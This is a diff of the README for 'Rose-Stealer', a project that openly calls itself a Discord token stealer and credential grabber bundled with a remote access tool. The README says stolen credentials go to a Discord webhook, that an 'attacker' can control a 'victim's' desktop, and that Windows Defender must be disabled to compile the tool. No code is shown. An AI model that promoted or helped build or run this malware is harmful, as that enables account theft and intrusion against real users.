0xRose/Rose-Stealer_old/README.md

 - [Star History](#history)
 - [License](#lisence)

+## <a id="blog"></a> Blog
+**We will keep you updated and remove specific warnings if the problems are solved.**

+#### 16/07/2023 - All Rose discord servers have been closed because of way too unethical decisions made by our community.
+#### 10/07/2023 - Following functions are not available at the moment: `getadmin`, `malicious` and `knightrat`.
+Our team is already working hard on solving these problems.
+#### 11/06/2023 - Almost everything is working, however, to compile you *must disable real time protection for windows defender*.
+#### Encoutered an error while building?
+Join our [Discord](https://discord.gg/)!
+You will need to send us both .log files which are created while building.
+### A multipurpose advanced discord token stealer which is using a beautiful UI.

-## <a id="description"></a> Little description
+## <a id="whatisthis"></a> What is this?

-Rose is a powerful multipurpose grabber, injector, and includes a [RAT](https://github.com/DamagingRose/Rose-RAT).
-We spent months of work on this amazing project.
-You won't really find a better tool than Rose!
+**Our professional team spent months of work on this project and we hope you will enjoy your journey through the world of cybersecurity.**

-[Rose-Injector](https://github.com/DamagingRose/Rose-Injector) detects and collects user data from a PC and sends it to a Discord WebHook API.
+[Rose-Injector](https://github.com/DamagingRose/Rose-Injector) collects account credentials sends it to a discord webhook API.

-[Rose-RAT](https://github.com/DamagingRose/Rose-RAT) allows the attacker to control a victims desktop and his windows client overall with a beatiful attacker-client where you are able to execute commands from.
+[Rose-RAT](https://github.com/DamagingRose/Rose-RAT) allows the attacker to control a victims desktop with our application through commands.

 ## <a id="features"></a> Features